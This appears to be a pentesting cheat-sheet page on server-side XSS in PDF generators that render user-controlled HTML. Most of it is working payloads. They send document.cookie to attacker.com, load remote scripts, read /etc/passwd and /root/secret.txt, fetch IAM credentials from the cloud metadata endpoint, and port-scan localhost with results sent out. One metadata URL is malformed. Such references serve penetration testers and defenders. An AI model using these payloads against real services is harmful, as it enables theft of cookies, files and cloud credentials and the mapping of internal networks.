# Server Side XSS \(Dynamic PDF\)

## Server Side XSS \(Dynamic PDF\)

If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.  
So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.

Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS \(for example, abusing `<img` \).  
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** \(using `document.write()` for example\). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** \(Blind\).

## Payloads

### Discovery

```markup
<!-- Basic discovery, Write "test"-->
<img src="x" onerror="document.write('test')" />

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
```

### Path disclosure

```markup
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
```

### Load an external script

The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.

```markup
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
```

### Read local file

```markup
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script> 
```

```markup
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
```

### Get external web page response as attachment \(metadata endpoints\)

```markup
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
```

### Bot delay

```markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = `https://attacker.com/ping?time=${time}ms`;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">
```

### Port Scan

```markup
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
        let img = document.createElement("img");
        img.src = `http://attacker.com/ping?port=${port}`;
    });
}

for(let i=0; i<1000; i++) {
    checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
```

### [SSRF](../ssrf-server-side-request-forgery.md)

This vulnerability can be transformed very easily in a SSRF \(as you can make the script load external resources\). So just try to exploit it \(read some metadata?\).

## References

{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}

{% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %}

{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}